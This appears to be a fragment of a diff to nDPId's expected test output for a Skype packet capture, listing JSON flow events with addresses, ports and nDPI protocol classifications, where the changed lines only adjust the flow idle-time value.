00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":128,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969671427,"flow_last_seen":1431969671427,"flow_idle_time":180000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.141","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969784741,"flow_last_seen":1431969808951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969784741,"flow_last_seen":1431969808951,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969789490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969789490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969784741,"flow_last_seen":1431969808951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":287,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969784741,"flow_last_seen":1431969808951,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":68,"flow_tot_l4_payload_len":262,"flow_avg_l4_payload_len":14,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"80.14.46.121","src_port":50142,"dst_port":4415,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969789490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1431969770694,"flow_last_seen":1431969789490,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":11,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50136,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969667439,"flow_last_seen":1431969667439,"flow_idle_time":180000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.168","src_port":13021,"dst_port":40006,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1431969771806,"flow_last_seen":1431969808100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2836,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} +00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1431969771806,"flow_last_seen":1431969808100,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1024,"flow_tot_l4_payload_len":2836,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50138,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":180000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969664405,"flow_last_seen":1431969664405,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.148","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969661414,"flow_last_seen":1431969661414,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.170","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":180000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969673443,"flow_last_seen":1431969673443,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.173","src_port":13021,"dst_port":40017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969662422,"flow_last_seen":1431969662422,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.143","src_port":13021,"dst_port":40018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969698797,"flow_last_seen":1431969718921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":1336,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":215,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1431969698797,"flow_last_seen":1431969718921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":1336,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.206.33.166","src_port":50090,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969654389,"flow_last_seen":1431969654389,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.165","src_port":13021,"dst_port":40020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969652367,"flow_last_seen":1431969652367,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.166","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":201,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969690481,"flow_last_seen":1431969690481,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} @@ -1262,26 +1252,26 @@ 00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969745776,"flow_last_seen":1431969745776,"flow_idle_time":180000,"flow_min_l4_payload_len":132,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":265,"flow_avg_l4_payload_len":132,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"239.255.255.250","src_port":64560,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1431969643037,"flow_last_seen":1431969643092,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":51879,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}} 00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969655400,"flow_last_seen":1431969655400,"flow_idle_time":180000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.146","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} -00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969714165,"flow_last_seen":1431969745160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969714165,"flow_last_seen":1431969745160,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969714165,"flow_last_seen":1431969745160,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00585{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1431969714165,"flow_last_seen":1431969745160,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":327,"flow_tot_l4_payload_len":368,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1431969713965,"flow_last_seen":1431969713965,"flow_idle_time":180000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":18,"flow_tot_l4_payload_len":18,"flow_avg_l4_payload_len":18,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.39","src_port":13021,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"Skype_Teams.SkypeCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1431969642969,"flow_last_seen":1431969723490,"flow_idle_time":180000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":270,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.1","src_port":49903,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969714902,"flow_last_seen":1431969731550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969714902,"flow_last_seen":1431969731550,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969714399,"flow_last_seen":1431969726002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50115,"dst_port":59621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969714399,"flow_last_seen":1431969726002,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50115,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1431969716015,"flow_last_seen":1431969752089,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1124,"flow_tot_l4_payload_len":2961,"flow_avg_l4_payload_len":74,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00637{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":100,"flow_first_seen":1431969715511,"flow_last_seen":1431969808618,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1183,"flow_tot_l4_payload_len":5646,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} -00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1431969642376,"flow_last_seen":1431969712120,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":2483,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"23.223.73.34","src_port":50027,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969714902,"flow_last_seen":1431969731550,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00584{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":19,"flow_first_seen":1431969714902,"flow_last_seen":1431969731550,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":260,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00599{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969714399,"flow_last_seen":1431969726002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50115,"dst_port":59621,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3284,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1431969714399,"flow_last_seen":1431969726002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":256,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1431969808951,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50115,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 